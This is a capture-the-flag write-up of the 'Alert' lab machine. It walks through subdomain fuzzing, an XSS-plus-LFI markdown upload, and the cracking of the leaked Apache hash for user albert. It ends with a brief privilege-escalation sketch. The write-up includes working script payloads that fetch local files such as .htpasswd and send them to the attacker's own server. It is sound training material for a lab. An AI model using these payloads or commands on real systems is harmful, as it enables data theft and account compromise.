Alert
Writeup of Alert machine

Reconnaissance
Nmap Scanning Process
These steps aid in mapping network topology and assessing security. The picture shows the machine has two open ports. 80 & 22.

Port 80: This port is commonly used for HTTP (Hypertext Transfer Protocol) traffic, which forms the foundation of the web. It is the default port for web servers to accept requests from web browsers over an unencrypted connection.
Port 22: Known as the default port for SSH (Secure Shell), it allows secure management and data transfer over unsecured networks. SSH is commonly used for remote server management and secure file transfers.
Subdomain Discovery Using Fuzzing Method
ffuf -c -u http://alert.htb -H "Host: FUZZ.alert.htb" -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -fc 301

http://statistics.alert.htb -> Asked Username & Password
http://alert.htb -> Output below

Identifying Bugs
Through analysis, it is clear that the page accepts a markdown (.md) file as input and visualizes. After doing some tests on Burpsuite, I suspected the XXS injection
and decided to try.
Exploitation
Our payload will look like 👏
Hosting a Malicious Server
python3 -m http.server 8888
Malicious Markdown File (MD File)
<script>
fetch("http://alert.htb/messages.php?file=filepath")
.then(response => response.text())
.then(data => {
fetch("http://10.10.xx.xx:8888/?file_content=" + encodeURIComponent(data));
});
</script>
//xx.xx => Should be replaced by your local IP
The application's LFI vulnerability was exploited when this file was uploaded in order to get private files and send their contents to my Python server. I received the vulnerable 'filepath'.
To get the password of user, I accessed the .htpasswd vulnerable file from statistics subdomain, where it was initially asking user's username and password.
<script>
fetch("http://alert.htb/messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd")
.then(response => response.text())
.then(data => {
fetch("http://10.10.21.21:8888/?file_content=" + encodeURIComponent(data));
});
</script>


User Flag

So, the encrypted password of the user will be:
%3Cpre%3Ealbert%3A%24apr1%24bMoRBJOg%24igG8WBtQ1xYDTQdLjSWZQ%2F%0A%3C%2Fpre%3E%0A
Put it on the CyberChef and decode it by URL Decoding Recipe : Result
albert:$apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
username -> albert
encrypted password as a hash -> $apr1$bMoRBJOg$igG8WBtQ1xYDTQdLjSWZQ/
In order decrypt the password, we need to identify the type of hash. Here, I used hashcat cheatsheet and got it
1600
Apache $apr1$ MD5, md5apr1, MD5 (APR)
hashcat -m 1600 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
Since hashcat requires quite huge amount of memory, you can use john the ripper tool.
john --wordlist=/usr/share/wordlists/rockyou.txt --format=md5crypt-long hash.txt

BOOM!!!
Go login as a user and read the user.txt file.
ssh albert@10.10.11.44
Root Flag
Privilege Escalation

Open port: 8080
ssh -L 8080:127.0.0.1:8080 albert@alert.htb
Testing the open port locally using ssh

The most interesting part is that the /opt directory has root permissions, providing a great opportunity to upload our shell and execute it from the browser.
The End!!! 🔚
Thank you!!! 🙏
Last updated